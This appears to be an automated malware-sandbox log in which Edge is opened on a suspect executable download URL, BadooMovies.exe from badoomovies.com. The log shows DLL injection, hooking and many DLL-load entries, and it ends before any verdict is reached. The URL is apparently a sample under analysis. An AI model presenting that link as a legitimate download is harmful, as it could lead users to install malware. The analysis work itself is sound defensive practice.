| Category | Package | Started | Completed | Duration | Options | Logs | ||||
|---|---|---|---|---|---|---|---|---|---|---|
| URL | edge | 2026-05-28 19:25:55 | 2026-05-28 19:31:24 | 329s |
|
|||||
| Reports | JSON | |||||||||
interactive=1
nohuman=yes
vnc_port=5910
2026-05-28 19:02:06,667 [root] INFO: Date set to: 20260528T19:26:02, timeout set to: 200
2026-05-28 19:26:02,018 [root] DEBUG: Starting analyzer from: C:\c6kogbu7
2026-05-28 19:26:02,020 [root] DEBUG: Storing results at: C:\IlgkUEVfG
2026-05-28 19:26:02,024 [root] DEBUG: Pipe server name: \\.\PIPE\VghgOt
2026-05-28 19:26:02,025 [root] DEBUG: Python path: C:\Users\admin\AppData\Local\Python\pythoncore-3.14-64
2026-05-28 19:26:02,026 [root] INFO: analysis running as an admin
2026-05-28 19:26:02,026 [root] INFO: analysis package specified: "edge"
2026-05-28 19:26:02,027 [root] DEBUG: importing analysis package module: "modules.packages.edge"...
2026-05-28 19:26:02,032 [root] DEBUG: imported analysis package "edge"
2026-05-28 19:26:02,033 [root] DEBUG: initializing analysis package "edge"...
2026-05-28 19:26:02,033 [root] DEBUG: New location of moved file: https://badoomovies.com/download/BadooMovies.exe
2026-05-28 19:26:02,034 [root] INFO: Analyzer: Package modules.packages.edge does not specify a dll option
2026-05-28 19:26:02,034 [root] INFO: Analyzer: Package modules.packages.edge does not specify a dll_64 option
2026-05-28 19:26:02,034 [root] INFO: Analyzer: Package modules.packages.edge does not specify a loader option
2026-05-28 19:26:02,035 [root] INFO: Analyzer: Package modules.packages.edge does not specify a loader_64 option
2026-05-28 19:26:02,045 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser"
2026-05-28 19:26:02,065 [root] DEBUG: Imported auxiliary module "modules.auxiliary.digisig"
2026-05-28 19:26:02,073 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise"
2026-05-28 19:26:02,079 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human"
2026-05-28 19:26:02,081 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2026-05-28 19:26:02,082 [lib.api.screenshot] ERROR: No module named 'PIL'
2026-05-28 19:26:02,082 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots"
2026-05-28 19:26:02,083 [root] DEBUG: Imported auxiliary module "modules.auxiliary.tlsdump"
2026-05-28 19:26:02,083 [root] DEBUG: Initialized auxiliary module "Browser"
2026-05-28 19:26:02,084 [root] DEBUG: attempting to configure 'Browser' from data
2026-05-28 19:26:02,084 [root] DEBUG: module Browser does not support data configuration, ignoring
2026-05-28 19:26:02,085 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.browser"...
2026-05-28 19:26:02,086 [root] DEBUG: Started auxiliary module modules.auxiliary.browser
2026-05-28 19:26:02,086 [root] DEBUG: Initialized auxiliary module "DigiSig"
2026-05-28 19:26:02,086 [root] DEBUG: attempting to configure 'DigiSig' from data
2026-05-28 19:26:02,087 [root] DEBUG: module DigiSig does not support data configuration, ignoring
2026-05-28 19:26:02,087 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.digisig"...
2026-05-28 19:26:02,087 [modules.auxiliary.digisig] DEBUG: Skipping authenticode validation, analysis is not a file
2026-05-28 19:26:02,087 [root] DEBUG: Started auxiliary module modules.auxiliary.digisig
2026-05-28 19:26:02,088 [root] DEBUG: Initialized auxiliary module "Disguise"
2026-05-28 19:26:02,088 [root] DEBUG: attempting to configure 'Disguise' from data
2026-05-28 19:26:02,089 [root] DEBUG: module Disguise does not support data configuration, ignoring
2026-05-28 19:26:02,089 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.disguise"...
2026-05-28 19:26:02,093 [modules.auxiliary.disguise] INFO: Launched background process notepad.exe hidden (PID: 4512)
2026-05-28 19:26:02,093 [modules.auxiliary.disguise] INFO: Disguising GUID to bdf4dc0a-7d09-4203-91c0-441a682546e9
2026-05-28 19:26:02,093 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise
2026-05-28 19:26:02,093 [root] DEBUG: Initialized auxiliary module "Human"
2026-05-28 19:26:02,094 [root] DEBUG: attempting to configure 'Human' from data
2026-05-28 19:26:02,094 [root] DEBUG: module Human does not support data configuration, ignoring
2026-05-28 19:26:02,094 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.human"...
2026-05-28 19:26:02,095 [root] DEBUG: Started auxiliary module modules.auxiliary.human
2026-05-28 19:26:02,095 [root] DEBUG: Initialized auxiliary module "Screenshots"
2026-05-28 19:26:02,095 [root] DEBUG: attempting to configure 'Screenshots' from data
2026-05-28 19:26:02,096 [root] DEBUG: module Screenshots does not support data configuration, ignoring
2026-05-28 19:26:02,096 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.screenshots"...
2026-05-28 19:26:02,096 [modules.auxiliary.screenshots] WARNING: Python Image Library is not installed, screenshots are disabled
2026-05-28 19:26:02,096 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots
2026-05-28 19:26:02,097 [root] DEBUG: Initialized auxiliary module "TLSDumpMasterSecrets"
2026-05-28 19:26:02,097 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data
2026-05-28 19:26:02,098 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring
2026-05-28 19:26:02,098 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.tlsdump"...
2026-05-28 19:26:02,100 [modules.auxiliary.tlsdump] WARNING: Unable to find lsass.exe process
2026-05-28 19:26:02,101 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump
2026-05-28 19:26:02,103 [root] INFO: Interactive mode enabled - injecting into explorer shell
2026-05-28 19:26:02,131 [lib.api.process] INFO: Monitor config for process 4712: C:\c6kogbu7\dll\4712.ini
2026-05-28 19:26:02,132 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:02,135 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:02,213 [root] DEBUG: Loader: Injecting process 4712 with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:02,393 [root] DEBUG: 4712: Python path set to 'C:\Users\admin\AppData\Local\Python\pythoncore-3.14-64'.
2026-05-28 19:26:02,399 [root] DEBUG: 4712: Disabling sleep skipping.
2026-05-28 19:26:02,401 [root] DEBUG: 4712: Interactive desktop enabled.
2026-05-28 19:26:02,406 [root] DEBUG: 4712: Dropped file limit defaulting to 100.
2026-05-28 19:26:02,411 [root] DEBUG: 4712: Interactive desktop - injecting Explorer Shell
2026-05-28 19:26:02,436 [root] DEBUG: 4712: YaraInit: Compiled 44 rule files
2026-05-28 19:26:02,438 [root] DEBUG: 4712: YaraInit: Compiled rules saved to file C:\c6kogbu7\data\yara\capemon.yac
2026-05-28 19:26:02,472 [root] DEBUG: 4712: RtlInsertInvertedFunctionTable 0x00007FFE766E090E, LdrpInvertedFunctionTableSRWLock 0x00007FFE7683D4F0
2026-05-28 19:26:02,473 [root] DEBUG: 4712: YaraScan: Scanning 0x00007FF7DD790000, size 0x545316
2026-05-28 19:26:02,512 [root] DEBUG: 4712: Monitor initialised: 64-bit capemon loaded in process 4712 at 0x00007FFE34DD0000, thread 2308, image base 0x00007FF7DD790000, stack from 0x000000000B4F2000-0x000000000B500000
2026-05-28 19:26:02,513 [root] DEBUG: 4712: Commandline: C:\Windows\Explorer.EXE
2026-05-28 19:26:02,524 [root] DEBUG: 4712: Hooked 69 out of 69 functions
2026-05-28 19:26:02,554 [root] DEBUG: 4712: Syscall hook installed, syscall logging level 1
2026-05-28 19:26:02,560 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2026-05-28 19:26:02,560 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:02,561 [lib.api.process] INFO: Injected into 64-bit <Process 4712 explorer.exe>
2026-05-28 19:26:09,668 [root] INFO: Restarting WMI Service
2026-05-28 19:26:11,705 [root] DEBUG: package modules.packages.edge does not support configure, ignoring
2026-05-28 19:26:11,706 [root] WARNING: configuration error for package modules.packages.edge: error importing data.packages.edge: No module named 'data.packages'
2026-05-28 19:26:11,707 [lib.core.compound] INFO: C:\Users\admin\AppData\Local\Temp already exists, skipping creation
2026-05-28 19:26:11,714 [lib.api.process] INFO: Successfully executed process from path "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" with arguments ""https://badoomovies.com/download/BadooMovies.exe"" with pid 4192
2026-05-28 19:26:11,714 [lib.api.process] INFO: Monitor config for process 4192: C:\c6kogbu7\dll\4192.ini
2026-05-28 19:26:11,715 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:11,717 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:11,721 [root] DEBUG: Loader: Injecting process 4192 (thread 3924) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:11,721 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:11,721 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:11,723 [lib.api.process] INFO: Injected into 64-bit <Process 4192 msedge.exe>
2026-05-28 19:26:13,725 [lib.api.process] INFO: Successfully resumed process with pid 4192
2026-05-28 19:26:13,795 [root] DEBUG: 4192: Python path set to 'C:\Users\admin\AppData\Local\Python\pythoncore-3.14-64'.
2026-05-28 19:26:13,795 [root] DEBUG: 4192: Disabling sleep skipping.
2026-05-28 19:26:13,796 [root] DEBUG: 4192: Interactive desktop enabled.
2026-05-28 19:26:13,796 [root] DEBUG: 4192: Dropped file limit defaulting to 100.
2026-05-28 19:26:13,805 [root] DEBUG: 4192: Edge-specific hook-set enabled.
2026-05-28 19:26:13,808 [root] DEBUG: 4192: YaraInit: Compiled rules loaded from existing file C:\c6kogbu7\data\yara\capemon.yac
2026-05-28 19:26:13,820 [root] DEBUG: 4192: RtlInsertInvertedFunctionTable 0x00007FFE766E090E, LdrpInvertedFunctionTableSRWLock 0x00007FFE7683D4F0
2026-05-28 19:26:13,821 [root] DEBUG: 4192: Monitor initialised: 64-bit capemon loaded in process 4192 at 0x00007FFE34DD0000, thread 3924, image base 0x00007FF6D90F0000, stack from 0x00000062D55F4000-0x00000062D5600000
2026-05-28 19:26:13,821 [root] DEBUG: 4192: Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://badoomovies.com/download/BadooMovies.exe"
2026-05-28 19:26:13,830 [root] DEBUG: 4192: Hooked 2 out of 2 functions
2026-05-28 19:26:13,873 [root] DEBUG: 4192: Syscall hook installed, syscall logging level 1
2026-05-28 19:26:13,878 [root] DEBUG: 4192: RestoreHeaders: Restored original import table.
2026-05-28 19:26:13,878 [root] INFO: Loaded monitor into process with pid 4192
2026-05-28 19:26:13,881 [root] DEBUG: 4192: DLL loaded at 0x00007FFE743A0000: C:\Windows\System32\bcryptprimitives (0x82000 bytes).
2026-05-28 19:26:13,885 [root] DEBUG: 4192: DLL loaded at 0x00007FFE5D810000: C:\Windows\SYSTEM32\version (0xa000 bytes).
2026-05-28 19:26:13,887 [root] DEBUG: 4192: DLL loaded at 0x00007FFE751C0000: C:\Windows\System32\shcore (0xad000 bytes).
2026-05-28 19:26:13,888 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73720000: C:\Windows\SYSTEM32\Wldp (0x2d000 bytes).
2026-05-28 19:26:13,888 [root] DEBUG: 4192: DLL loaded at 0x00007FFE71E90000: C:\Windows\SYSTEM32\windows.storage (0x79b000 bytes).
2026-05-28 19:26:13,889 [root] DEBUG: 4192: DLL loaded at 0x00007FFE751C0000: C:\Windows\System32\SHCORE (0xad000 bytes).
2026-05-28 19:26:13,890 [root] DEBUG: 4192: DLL loaded at 0x00007FFE72EF0000: C:\Windows\SYSTEM32\ntmarta (0x33000 bytes).
2026-05-28 19:26:14,039 [root] DEBUG: 4192: DLL loaded at 0x00007FFE61E90000: C:\Windows\SYSTEM32\WINMM (0x27000 bytes).
2026-05-28 19:26:14,050 [root] DEBUG: 4192: DLL loaded at 0x00007FFE20BF0000: C:\Program Files (x86)\Microsoft\Edge\Application\148.0.3967.83\msedge (0x136be000 bytes).
2026-05-28 19:26:14,053 [root] DEBUG: 4192: DLL loaded at 0x00007FFE626C0000: C:\Windows\SYSTEM32\KBDUS (0x9000 bytes).
2026-05-28 19:26:14,055 [root] DEBUG: 4192: DLL loaded at 0x00007FFE71770000: C:\Windows\system32\uxtheme (0x9e000 bytes).
2026-05-28 19:26:14,062 [root] DEBUG: 4192: DLL loaded at 0x00007FFE71C90000: C:\Windows\SYSTEM32\kernel.appcore (0x12000 bytes).
2026-05-28 19:26:14,063 [root] DEBUG: 4192: CreateProcessHandler: Injection info set for new process 7600: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ImageBase: 0x00007FF6D90F0000
2026-05-28 19:26:14,063 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 7600
2026-05-28 19:26:14,063 [root] DEBUG: 4192: DLL loaded at 0x00007FFE76420000: C:\Windows\System32\clbcatq (0xa9000 bytes).
2026-05-28 19:26:14,064 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 7600
2026-05-28 19:26:14,065 [root] DEBUG: 4192: DLL loaded at 0x00007FFE69B20000: C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings (0x16000 bytes).
2026-05-28 19:26:14,067 [root] DEBUG: 4192: DLL loaded at 0x00007FFE72E40000: C:\Windows\SYSTEM32\msvcp110_win (0x8a000 bytes).
2026-05-28 19:26:14,067 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6E1D0000: C:\Windows\SYSTEM32\policymanager (0xa1000 bytes).
2026-05-28 19:26:14,072 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73CA0000: C:\Windows\SYSTEM32\USERENV (0x2e000 bytes).
2026-05-28 19:26:14,074 [root] DEBUG: 4192: DLL loaded at 0x00007FFE72640000: C:\Windows\SYSTEM32\gpapi (0x23000 bytes).
2026-05-28 19:26:14,078 [root] DEBUG: 4192: DLL loaded at 0x00007FFE72ED0000: C:\Windows\SYSTEM32\wkscli (0x19000 bytes).
2026-05-28 19:26:14,080 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73280000: C:\Windows\SYSTEM32\netutils (0xc000 bytes).
2026-05-28 19:26:14,081 [root] DEBUG: 4192: DLL loaded at 0x00007FFE72E40000: C:\Windows\SYSTEM32\msvcp110_win (0x8a000 bytes).
2026-05-28 19:26:14,081 [root] DEBUG: 4192: DLL loaded at 0x00007FFE69AB0000: C:\Windows\SYSTEM32\MDMRegistration (0x68000 bytes).
2026-05-28 19:26:14,083 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73C10000: C:\Windows\SYSTEM32\powrprof (0x4b000 bytes).
2026-05-28 19:26:14,083 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73670000: C:\Windows\SYSTEM32\CRYPTSP (0x18000 bytes).
2026-05-28 19:26:14,084 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73790000: C:\Windows\SYSTEM32\ncrypt (0x27000 bytes).
2026-05-28 19:26:14,084 [root] DEBUG: 4192: DLL loaded at 0x00007FFE752B0000: C:\Windows\System32\imagehlp (0x1d000 bytes).
2026-05-28 19:26:14,085 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6C350000: C:\Windows\SYSTEM32\tbs (0x1b000 bytes).
2026-05-28 19:26:14,085 [root] DEBUG: 4192: DLL loaded at 0x00007FFE5C520000: C:\Windows\SYSTEM32\DMCmnUtils (0x7c000 bytes).
2026-05-28 19:26:14,087 [root] DEBUG: 4192: DLL loaded at 0x00007FFE69A70000: C:\Windows\SYSTEM32\omadmapi (0x3a000 bytes).
2026-05-28 19:26:14,088 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73BF0000: C:\Windows\SYSTEM32\UMPDC (0x12000 bytes).
2026-05-28 19:26:14,089 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73750000: C:\Windows\SYSTEM32\NTASN1 (0x3b000 bytes).
2026-05-28 19:26:14,091 [root] DEBUG: 4192: DLL loaded at 0x00007FFE600F0000: C:\Windows\SYSTEM32\netapi32 (0x19000 bytes).
2026-05-28 19:26:14,092 [root] DEBUG: 4192: DLL loaded at 0x00007FFE72E40000: C:\Windows\SYSTEM32\msvcp110_win (0x8a000 bytes).
2026-05-28 19:26:14,094 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73670000: C:\Windows\SYSTEM32\cryptsp (0x18000 bytes).
2026-05-28 19:26:14,095 [root] DEBUG: 4192: DLL loaded at 0x00007FFE71270000: C:\Windows\SYSTEM32\DSREG (0x141000 bytes).
2026-05-28 19:26:14,096 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73CE0000: C:\Windows\SYSTEM32\profapi (0x25000 bytes).
2026-05-28 19:26:14,105 [root] DEBUG: 4192: DLL loaded at 0x00007FFE69B00000: C:\Windows\System32\AssignedAccessRuntime (0x14000 bytes).
2026-05-28 19:26:14,106 [root] DEBUG: 4192: DLL loaded at 0x00007FFE75A80000: C:\Windows\System32\MSCTF (0x114000 bytes).
2026-05-28 19:26:14,107 [root] DEBUG: 4192: DLL loaded at 0x00007FFE699E0000: C:\Windows\System32\SystemSettings.DataModel (0x74000 bytes).
2026-05-28 19:26:14,108 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73C10000: C:\Windows\SYSTEM32\powrprof (0x4b000 bytes).
2026-05-28 19:26:14,109 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73BF0000: C:\Windows\SYSTEM32\UMPDC (0x12000 bytes).
2026-05-28 19:26:14,111 [root] DEBUG: 4192: DLL loaded at 0x00007FFE661E0000: C:\Windows\SYSTEM32\DWrite (0x27f000 bytes).
2026-05-28 19:26:14,114 [root] DEBUG: 4192: DLL loaded at 0x00007FFE60710000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.3636_none_60b6a03d71f818d5\COMCTL32 (0x29a000 bytes).
2026-05-28 19:26:14,115 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6CDC0000: C:\Windows\System32\OneCoreUAPCommonProxyStub (0x7d0000 bytes).
2026-05-28 19:26:14,116 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73B30000: C:\Windows\SYSTEM32\DPAPI (0xa000 bytes).
2026-05-28 19:26:14,117 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73170000: C:\Windows\SYSTEM32\IPHLPAPI (0x3b000 bytes).
2026-05-28 19:26:14,118 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6F2A0000: C:\Windows\system32\NLAapi (0x1d000 bytes).
2026-05-28 19:26:14,119 [root] DEBUG: 4192: DLL loaded at 0x00007FFE752A0000: C:\Windows\System32\NSI (0x8000 bytes).
2026-05-28 19:26:14,120 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73E80000: C:\Windows\System32\CFGMGR32 (0x4e000 bytes).
2026-05-28 19:26:14,121 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6D680000: C:\Windows\SYSTEM32\dhcpcsvc6 (0x17000 bytes).
2026-05-28 19:26:14,122 [root] DEBUG: 4192: DLL loaded at 0x00007FFE67B80000: C:\Windows\System32\StructuredQuery (0xa6000 bytes).
2026-05-28 19:26:14,124 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6D660000: C:\Windows\SYSTEM32\dhcpcsvc (0x1d000 bytes).
2026-05-28 19:26:14,125 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6F930000: C:\Windows\SYSTEM32\PROPSYS (0xf6000 bytes).
2026-05-28 19:26:14,126 [root] DEBUG: 4192: DLL loaded at 0x00007FFE731B0000: C:\Windows\SYSTEM32\DNSAPI (0xca000 bytes).
2026-05-28 19:26:14,128 [root] DEBUG: 4192: DLL loaded at 0x00007FFE696D0000: C:\Windows\System32\Windows.StateRepositoryPS (0x146000 bytes).
2026-05-28 19:26:14,131 [root] DEBUG: 4192: DLL loaded at 0x00007FFE71170000: C:\Windows\System32\CoreMessaging (0xf2000 bytes).
2026-05-28 19:26:14,132 [root] DEBUG: 4192: DLL loaded at 0x00007FFE70740000: C:\Windows\SYSTEM32\wintypes (0x155000 bytes).
2026-05-28 19:26:14,132 [root] DEBUG: 4192: DLL loaded at 0x00007FFE70E10000: C:\Windows\System32\CoreUIComponents (0x35b000 bytes).
2026-05-28 19:26:14,132 [root] DEBUG: 4192: DLL loaded at 0x00007FFE688F0000: C:\Windows\SYSTEM32\textinputframework (0xf9000 bytes).
2026-05-28 19:26:14,133 [root] DEBUG: 4192: DLL loaded at 0x00007FFE69500000: C:\Windows\system32\Windows.Storage.Search (0xc6000 bytes).
2026-05-28 19:26:14,136 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6E670000: C:\Windows\System32\twinapi.appcore (0x203000 bytes).
2026-05-28 19:26:14,139 [root] DEBUG: 4192: DLL loaded at 0x00007FFE68250000: C:\Windows\system32\mssprxy (0x28000 bytes).
2026-05-28 19:26:14,140 [root] DEBUG: 4192: DLL loaded at 0x00007FFE60410000: C:\Windows\system32\twinapi (0xa9000 bytes).
2026-05-28 19:26:14,142 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6DB20000: C:\Windows\SYSTEM32\wevtapi (0x65000 bytes).
2026-05-28 19:26:14,144 [root] DEBUG: 4192: DLL loaded at 0x00007FFE64970000: C:\Windows\SYSTEM32\edputil (0x24000 bytes).
2026-05-28 19:26:14,147 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6E8B0000: C:\Windows\System32\WindowManagementAPI (0xa1000 bytes).
2026-05-28 19:26:14,147 [root] DEBUG: 4192: DLL loaded at 0x00007FFE68790000: C:\Windows\System32\InputHost (0x152000 bytes).
2026-05-28 19:26:14,148 [root] DEBUG: 4192: DLL loaded at 0x00007FFE69000000: C:\Windows\System32\Windows.UI (0x141000 bytes).
2026-05-28 19:26:14,150 [root] DEBUG: 4192: DLL loaded at 0x00007FFE69C90000: C:\Windows\System32\iertutil (0x2bc000 bytes).
2026-05-28 19:26:14,151 [root] DEBUG: 4192: DLL loaded at 0x00007FFE64040000: C:\Windows\System32\Windows.Web (0xc3000 bytes).
2026-05-28 19:26:14,152 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6FA60000: C:\Windows\SYSTEM32\WTSAPI32 (0x14000 bytes).
2026-05-28 19:26:14,156 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73A70000: C:\Windows\SYSTEM32\WINSTA (0x5b000 bytes).
2026-05-28 19:26:14,157 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6DF20000: C:\Windows\SYSTEM32\ColorAdapterClient (0x11000 bytes).
2026-05-28 19:26:14,158 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6E120000: C:\Windows\SYSTEM32\mscms (0xae000 bytes).
2026-05-28 19:26:14,159 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6ED00000: C:\Windows\SYSTEM32\WINHTTP (0x10a000 bytes).
2026-05-28 19:26:14,194 [root] DEBUG: 4192: DLL loaded at 0x00007FFE20620000: C:\Program Files (x86)\Microsoft\Edge\Application\148.0.3967.83\oneauth (0x5c4000 bytes).
2026-05-28 19:26:14,214 [root] DEBUG: 4192: DLL loaded at 0x00007FFE682C0000: C:\Windows\System32\Windows.UI.Immersive (0x139000 bytes).
2026-05-28 19:26:14,221 [root] DEBUG: 4192: CreateProcessHandler: Injection info set for new process 5416: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ImageBase: 0x00007FF6D90F0000
2026-05-28 19:26:14,224 [root] DEBUG: 4192: DLL loaded at 0x00007FFE64CF0000: C:\Windows\SYSTEM32\Secur32 (0xc000 bytes).
2026-05-28 19:26:14,224 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 5416
2026-05-28 19:26:14,228 [root] DEBUG: 4192: caller_dispatch: Added region at 0x00007FF6D90F0000 to tracked regions list (kernel32::CreateProcessInternalW returns to 0x00007FF6D91E7D66, thread 1344).
2026-05-28 19:26:14,230 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 5416
2026-05-28 19:26:14,237 [root] DEBUG: 4192: ProcessImageBase: Main module image at 0x00007FF6D90F0000 unmodified (entropy change 0.000000e+00)
2026-05-28 19:26:14,239 [root] DEBUG: 4192: CreateProcessHandler: Injection info set for new process 5424: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ImageBase: 0x00007FF6D90F0000
2026-05-28 19:26:14,251 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 5424
2026-05-28 19:26:14,252 [root] DEBUG: 4192: CreateProcessHandler: Injection info set for new process 2620: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ImageBase: 0x00007FF6D90F0000
2026-05-28 19:26:14,252 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 5424
2026-05-28 19:26:14,253 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 2620
2026-05-28 19:26:14,254 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 2620
2026-05-28 19:26:14,279 [root] DEBUG: 4192: DLL loaded at 0x00007FFE604C0000: C:\Windows\SYSTEM32\LINKINFO (0xd000 bytes).
2026-05-28 19:26:14,312 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73B40000: C:\Windows\SYSTEM32\sxs (0xa2000 bytes).
2026-05-28 19:26:14,319 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6EF30000: C:\Windows\SYSTEM32\usermgrcli (0x16000 bytes).
2026-05-28 19:26:14,321 [root] DEBUG: 4192: DLL loaded at 0x00007FFE5D100000: C:\Windows\System32\Windows.Internal.UI.Shell.WindowTabManager (0x6d000 bytes).
2026-05-28 19:26:14,325 [root] DEBUG: 4192: DLL loaded at 0x00007FFE72670000: C:\Windows\system32\dxgi (0xf3000 bytes).
2026-05-28 19:26:14,326 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6FA80000: C:\Windows\system32\d3d11 (0x263000 bytes).
2026-05-28 19:26:14,326 [root] DEBUG: 4192: DLL loaded at 0x00007FFE708A0000: C:\Windows\system32\dcomp (0x1e3000 bytes).
2026-05-28 19:26:14,327 [root] DEBUG: 4192: DLL loaded at 0x00007FFE60630000: C:\Windows\system32\dataexchange (0x3e000 bytes).
2026-05-28 19:26:14,350 [root] DEBUG: 4192: DLL loaded at 0x00007FFE69920000: C:\Windows\System32\Windows.System.Profile.RetailInfo (0x28000 bytes).
2026-05-28 19:26:14,363 [root] DEBUG: 4192: DLL loaded at 0x00007FFE719A0000: C:\Windows\SYSTEM32\dwmapi (0x2f000 bytes).
2026-05-28 19:26:14,369 [root] DEBUG: 4192: DLL loaded at 0x00007FFE5F8F0000: C:\Windows\SYSTEM32\OLEACC (0x66000 bytes).
2026-05-28 19:26:14,370 [root] DEBUG: 4192: CreateProcessHandler: Injection info set for new process 2512: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ImageBase: 0x00007FF6D90F0000
2026-05-28 19:26:14,371 [root] DEBUG: 4192: CreateProcessHandler: Injection info set for new process 6736: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ImageBase: 0x00007FF6D90F0000
2026-05-28 19:26:14,372 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 2512
2026-05-28 19:26:14,373 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 6736
2026-05-28 19:26:14,374 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 2512
2026-05-28 19:26:14,374 [root] DEBUG: 4192: DLL loaded at 0x00007FFE65220000: C:\Windows\system32\directmanipulation (0x9d000 bytes).
2026-05-28 19:26:14,375 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 6736
2026-05-28 19:26:14,407 [root] DEBUG: 4712: YaraScan: Scanning 0x00007FF7DD790000, size 0x545316
2026-05-28 19:26:14,444 [root] DEBUG: 4712: caller_dispatch: Added region at 0x00007FF7DD790000 to tracked regions list (ntdll::NtCreateFile returns to 0x00007FF7DD7BCA89, thread 4160).
2026-05-28 19:26:14,454 [root] DEBUG: 4192: DLL loaded at 0x00007FFE625A0000: C:\Windows\System32\Windows.Security.Authentication.Web.Core (0x11d000 bytes).
2026-05-28 19:26:14,461 [root] DEBUG: 4712: ProcessImageBase: Main module image at 0x00007FF7DD790000 unmodified (entropy change 2.623369e-06)
2026-05-28 19:26:14,462 [root] DEBUG: 4712: YaraScan: Scanning 0x00007FF7DD790000, size 0x545316
2026-05-28 19:26:14,463 [root] DEBUG: 4192: DLL loaded at 0x00007FFE5C380000: C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Well Known Domains\1.2.0.0\well_known_domains (0x9e000 bytes).
2026-05-28 19:26:14,469 [root] DEBUG: 4192: DLL loaded at 0x00007FFE64F60000: C:\Windows\System32\OneCoreCommonProxyStub (0x7f000 bytes).
2026-05-28 19:26:14,474 [root] DEBUG: 4192: DLL loaded at 0x00007FFE738B0000: C:\Windows\SYSTEM32\MSASN1 (0x12000 bytes).
2026-05-28 19:26:14,476 [root] DEBUG: 4192: DLL loaded at 0x00007FFE56690000: C:\Windows\System32\vaultcli (0x51000 bytes).
2026-05-28 19:26:14,487 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73670000: C:\Windows\SYSTEM32\CRYPTSP (0x18000 bytes).
